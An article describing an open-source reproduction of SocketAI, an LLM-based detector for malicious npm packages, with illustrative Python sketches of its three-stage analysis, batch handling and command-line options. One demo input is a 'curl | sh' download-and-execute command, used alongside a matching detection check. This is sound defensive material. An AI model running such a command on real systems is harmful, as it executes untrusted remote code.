SocketAI Reproduction: Detecting Malicious npm Packages Using LLM

An open-source reproduction of the ICSE 2025 paper SocketAI: a tool that detects malicious code in npm packages using a three-stage LLM analysis workflow, with optional CodeQL pre-screening and full export of experimental data.

Tags: npm, security, LLM, malware detection, CodeQL, static analysis, supply chain security

Published 2026-04-08 16:14 | Recent activity 2026-04-08 16:21 | Estimated read 6 min

Section 01

SocketAI Reproduction: Guide to the LLM-Powered Malicious npm Package Detection Tool

This article introduces an open-source reproduction of SocketAI, a system described in an ICSE 2025 paper. The tool detects malicious code in npm packages using a three-stage LLM analysis workflow, and it supports optional CodeQL pre-screening and full export of experimental data. It targets a known weakness of traditional static analysis in the npm ecosystem: difficulty keeping up with new kinds of malicious attacks.

Section 02

Research Background and Motivation

npm is the world's largest software package repository, with over 2 million packages. That scale brings convenience, but it also exposes users to malicious code: install scripts that execute malicious commands, tampered dependencies, and payloads hidden behind obfuscation. Traditional detection methods have limitations. Signature-based detection requires frequent rule updates, and behavior-based detection suffers from high false positive rates. The semantic understanding of LLMs can compensate for these shortcomings by distinguishing between code that looks syntactically similar but has different intent, for example cleaning up temporary files versus deleting system files.

Section 03

SocketAI's Core Methodology

SocketAI adopts a three-stage progressive analysis strategy:
1. Initial Malicious Assessment: the LLM quickly screens each file and estimates how likely it is to be malicious, considering signals such as obfuscation, network requests, and access to sensitive paths.
2. Self-Review and Correction: the model re-examines its initial judgment to reduce misjudgments caused by insufficient context or superficial similarity.
3. Final File-Level Determination: the model consolidates the earlier stages into a clear malicious score and a reasoning process that a human reviewer can check.
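The three stages can be sketched as three chained model calls, each one seeing the result of the previous stage. This is a minimal illustration and not the project's code: `analyze_file`, `FileVerdict`, the prompt wording, the 0-to-1 score scale, and the `fake_llm` stand-in are all assumptions made here so that the example runs without an API key.

```python
from dataclasses import dataclass
from typing import Callable, Tuple

# Hypothetical interface: a function that takes a prompt and returns
# (score in [0, 1], free-text reason). A real client would call an LLM API.
LLMFn = Callable[[str], Tuple[float, str]]


@dataclass
class FileVerdict:
    path: str
    initial_score: float
    reviewed_score: float
    final_score: float
    rationale: str
    malicious: bool


def analyze_file(path: str, source: str, llm: LLMFn, threshold: float = 0.5) -> FileVerdict:
    """Run the three stages on one file (prompts are illustrative only)."""
    # Stage 1: initial malicious assessment.
    initial_score, initial_reason = llm(
        f"[initial] Assess this file for malicious behavior:\n{source}"
    )
    # Stage 2: self-review of the first judgment.
    reviewed_score, review_reason = llm(
        f"[review] Earlier score {initial_score:.2f} because: {initial_reason}\n"
        f"Re-check the file and correct the score if needed:\n{source}"
    )
    # Stage 3: final file-level determination with reasoning.
    final_score, rationale = llm(
        f"[final] Initial={initial_score:.2f}, reviewed={reviewed_score:.2f} "
        f"({review_reason}). Give a final score and reasoning:\n{source}"
    )
    # Assumption: a file is flagged when the final score reaches the threshold.
    return FileVerdict(path, initial_score, reviewed_score, final_score,
                       rationale, final_score >= threshold)


def fake_llm(prompt: str) -> Tuple[float, str]:
    """Stand-in for a model: flags code that pipes a download into a shell."""
    suspicious = "curl" in prompt and "| sh" in prompt
    if suspicious:
        return 0.9, "downloads and executes a remote script"
    return 0.1, "no risky behavior seen"


if __name__ == "__main__":
    verdict = analyze_file(
        "install.js",
        "require('child_process').exec('curl http://x | sh')",
        fake_llm,
    )
    print(verdict.malicious, verdict.rationale)
```

Keeping all three scores on the result object makes it possible to see how often the self-review stage actually changes the initial judgment.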

Section 04

Highlights of Engineering Implementation

The reproduced version balances academic rigor and engineering practicality:
1. Optional CodeQL Pre-screening: uses CodeQL to quickly identify risk patterns, reducing the amount of code that needs LLM analysis.
2. Observability: exports data from each analysis step, including the prompt, the response, token consumption, and time cost.
3. Flexible Input: supports local directories and tgz/tar/zip archives.
4. Batch Processing: runs batch detection from JSONL/CSV lists, and an error in an individual sample does not interrupt the batch.
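The batch behavior described above, where one failing sample does not stop the run, can be sketched as follows. This is an assumption-laden illustration rather than the project's implementation: the JSONL field name `path`, the column names, and the helpers `run_batch`, `to_csv`, and `demo_analyze` are hypothetical.

```python
import csv
import io
import json
import time
from typing import Callable, Dict, List

FIELDS = ["line", "package", "score", "status", "error", "seconds"]


def run_batch(jsonl_text: str, analyze: Callable[[str], float]) -> List[Dict[str, object]]:
    """Analyze every JSONL entry; record failures instead of raising."""
    rows: List[Dict[str, object]] = []
    for line_no, line in enumerate(jsonl_text.splitlines(), start=1):
        if not line.strip():
            continue  # skip blank lines
        started = time.perf_counter()
        row: Dict[str, object] = {
            "line": line_no, "package": "", "score": "", "status": "ok", "error": "",
        }
        try:
            entry = json.loads(line)
            row["package"] = entry["path"]  # hypothetical field name
            row["score"] = analyze(entry["path"])
        except Exception as exc:
            # Isolate the failure to this sample and keep going.
            row["status"] = "error"
            row["error"] = f"{type(exc).__name__}: {exc}"
        row["seconds"] = round(time.perf_counter() - started, 4)
        rows.append(row)
    return rows


def to_csv(rows: List[Dict[str, object]]) -> str:
    """Serialize the per-sample records as CSV text."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def demo_analyze(path: str) -> float:
    """Stand-in analyzer that fails on one kind of input."""
    if path.endswith(".broken"):
        raise ValueError("cannot unpack archive")
    return 0.2


if __name__ == "__main__":
    text = '{"path": "a.tgz"}\n{"path": "b.broken"}\nnot json\n{"path": "c.zip"}\n'
    print(to_csv(run_batch(text, demo_analyze)))
```

Recording the error text and elapsed time per row keeps failed samples visible in the exported data instead of silently dropping them.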

Section 05

Usage and Output Structure

The tool is written in Python and uses uv for dependency management. The project provides example commands for basic detection (without CodeQL) and for detection with CodeQL pre-screening enabled. Key parameters are input (the input path), model (the LLM model to use), use-codeql/no-codeql (turn pre-screening on or off), threshold (the decision threshold applied to the malicious score), and temperature (the sampling temperature, which controls how random the model's output is). The output is clearly structured and includes runtime metadata, a package-level summary, the file list, performance metrics, detailed results for each stage, and exported data in CSV format.
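To make the roles of these parameters concrete, here is a hypothetical argument parser built around the same parameter names. It is not the project's actual command-line interface: the exact flag spellings, the defaults, the placeholder model name, and the `is_malicious` rule (score at or above the threshold) are assumptions for illustration.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    """Illustrative parser only; the real tool's flags and defaults may differ."""
    parser = argparse.ArgumentParser(
        description="Illustrative CLI sketch, not the project's actual interface."
    )
    parser.add_argument("--input", required=True,
                        help="local directory or tgz/tar/zip archive to scan")
    parser.add_argument("--model", default="example-model",
                        help="LLM model name (placeholder default)")
    # Two opposite switches that write to the same destination.
    codeql = parser.add_mutually_exclusive_group()
    codeql.add_argument("--use-codeql", dest="use_codeql", action="store_true",
                        help="enable CodeQL pre-screening")
    codeql.add_argument("--no-codeql", dest="use_codeql", action="store_false",
                        help="skip CodeQL pre-screening")
    parser.set_defaults(use_codeql=False)  # assumed default
    parser.add_argument("--threshold", type=float, default=0.5,
                        help="decision threshold for the malicious score (assumed default)")
    parser.add_argument("--temperature", type=float, default=0.0,
                        help="sampling temperature (assumed default)")
    return parser


def is_malicious(score: float, threshold: float) -> bool:
    """Assumed decision rule: flag when the score reaches the threshold."""
    return score >= threshold


if __name__ == "__main__":
    args = build_parser().parse_args(
        ["--input", "pkg.tgz", "--use-codeql", "--threshold", "0.7"]
    )
    print(args.use_codeql, is_malicious(0.8, args.threshold))
```

A low temperature is a common choice for classification-style tasks because it makes repeated runs on the same file more consistent.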

Section 06

Practical Significance and Outlook

For security teams, the tool complements existing detection systems: traditional rules capture known threats, while the LLM helps discover new attacks. For researchers, the full data export makes it easier to test new ideas, such as swapping models or adjusting strategies. The tool provides a practical research platform for npm security detection and is an example of turning academic results into engineering practice.

Section 07

Conclusion

Software supply chain attacks are becoming increasingly frequent, which makes security detection for npm packages crucial. The SocketAI reproduction demonstrates the potential of LLMs in the security field. Although it is not a panacea, it offers capabilities that are hard for traditional methods to achieve in scenarios that depend on semantic understanding. The open-source reproduction not only verifies the original paper's method but also gives the community a runnable and improvable baseline implementation.
